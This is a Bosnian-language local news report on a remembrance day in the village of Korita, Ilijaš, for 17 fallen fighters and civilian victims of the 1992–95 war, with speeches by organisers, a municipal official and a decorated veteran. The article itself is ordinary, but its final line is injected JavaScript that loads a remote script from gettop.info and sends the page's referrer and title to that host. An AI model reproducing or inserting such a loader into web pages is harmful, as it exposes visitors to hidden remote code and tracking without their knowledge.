Obilježen Dan sjećanja na šehide i civilne žrtve rata sela Korita

Godinu dana nakon otkrivanja spomenika sagrađenog u znak sjećanja na 17 poginulih šehida i civilnih žrtava rata sela Korita, spomen obilježja koje će biti trajni podsjetnik na doprinos Korita i žrtvu koje je stanovništvo ovog mjesta dalo u  Odbrambeno-oslobodilačkom ratu ‘92.-’95 godine, obilježen je Dan sjećanja na šehide i civilne žrtve rata ovoga sela. Iz vremena posljednje agresije na Bosnu i Hercegovinu (1992-1995), u svim našim sredinama, kako gradskim tako i seoskim, lahko je zapaziti šehidska mezarja, ili šehitluke. Skoro da danas nema niti jednog mjesta, u našoj Bosni, koje nema šehidsko obilježje. I tako, svaki dio naše Bosne, na svoj način, nosi svoja bolna sjećanja na teška vremena i svoje šehide. Današnji dan je podsjećanje na obavezu, da se ne zaboravi vječni dug prema hrabrim borcima i braniteljima Korita koji su dali svoju krv, djelove tjela ili položili živote u odbrani Bosne i Hercegovine. Predsjednik Organizacionog odbora za obilježavanje Dana sjećanja na šehide i civilne žrtve rata ”Korita ‘92-95”, Akif Bešlija naglasio je kako postoji obaveza prema ljudima koji su dali svoje živote, te kako ga posebno raduje broj omladine koja danas obilježava ovaj datum.

”Želim svima da se zahvalim na dolasku i vašem izdvojem vremenu da danas, nakon godinu dana od podizanja ovog našeg Spomen obilježja šehidima i civilnim žrtvama rata sela Korita. Ovi datumi trebali bi da obilježavaju, ne samo na Koritima nego i na svim mjestima gdje postoje ovakvi simboli i spomenici. Mi imamo obavezu prema tim ljudima koji su dali svoje živote, da ih se prisjećamo i na ovaj način odajemo počast. Drago mi je da vidim veći broj omladine danas ovdje koja se okupila, ta omladina kroz svoje školovanje neće naučiti tu historiju koja govori o stradanjima od ‘92-95. godine, naša obaveza jeste da njima prenosimo ta dešavanja i sjećanja na naše šehide. Duboko sam uvjeren da mrtvi žive, sve dok ima živih koji misle na njih. To je jedna od pravih poruka, i molim vas da tu poruku nosimo dok smo živi” poručio je Akifa Bešlija, predsjednik Organizacionog odbora

Pomoćnik načelnika u Službi za boračko-invalidsku zaštitu Nijaz Spahić, istakao je važnost obilježavanja ovakvih datuma, ali i važnost podsjećanja na sve strahote koje su se dogodile kako se iste ne bi ponovile mlađim naraštajima.

”Veoma je važno da ste vi danas ovdje. Oni koji su preživjeli sva ova dešavanja i golgotu u proteklom ratu, tu su da nam govore kako se sve desilo, i naravno oni koji su rođeni poslije rata da sve ovo vide, čuju i dobro zapamte kako ne bi bila generacija koja će ponovo pretrpjeti sve strahote rata. Općina Ilijaš će uvijek podržavati materijalno i u svakom drugom pogledu ovakve manifestacije. Kao što je već rečeno mi živimo u dijelu Bosne i Hercegovine gdje ovakve stvari naša djeca i naši učenici ne mogu da uče, zbog čega je bitno da gajimo kulturu sjećanja i obilježavamo ovakve datume, pravimo Spomen obilježja, da pišemo knjige kako bi se sve moglo i vidjeti i čuti. Porodicama šehida i poginulih boraca želim sabur, a svima nama bolju i prosperitetniju budućnost”, kazao je pomoćnik načelnika u Službi za boračko-invalidsku zaštitu općine Ilijaš.

Ferid Bešlija, nosilac najvećeg ratnog priznanja ”Zlatni ljiljan” poručio je prisutnima da budu jedni uz druge, te izrazio želju da u budućnosti ovakva okupljanja budu jos veća.

”Ja vam neću pričati o našim bitkama, ali ću vam reći ponosno, posebno ovoj našoj omladini koja je danas tu, čast mi je što sam se rodio u ovom selu  u ovom historijskom mjestu. Ovdje sam naučio sve što znam, i ovdje ću ostaviti poruku mladima da budu jedni uz druge kao što smo to bili mi i vaši roditelji. Bili smo jedni uz druge, borili smo i bili spremni dati život jedni za druge i potrebno je da mladi nastave tu tradiciju, da ova okupljanja budu u što većem broju i većeg karaktera”, istakao je Ferid Bešlija, nosilac najvećeg ratnog priznanja ”Zlatni ljiljan”.

Svoje literarne radove prisutnima su predstavile Selma i Emina Bešlija, nakon čega je ašare proučio Abid ef. Avdukić. Polaganjem cvijeća završen je prvi dio manifestacije Dani sjećanja na šehide i civilne žrtve rata ”Korita ‘92-95”nakon čega je na dovištu Starčevina u 12 sati proučen tevhid šehidima i civilnim žrtvama rata, a nakon podne namaza klanjat će se i tradicionalna dova.

 s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;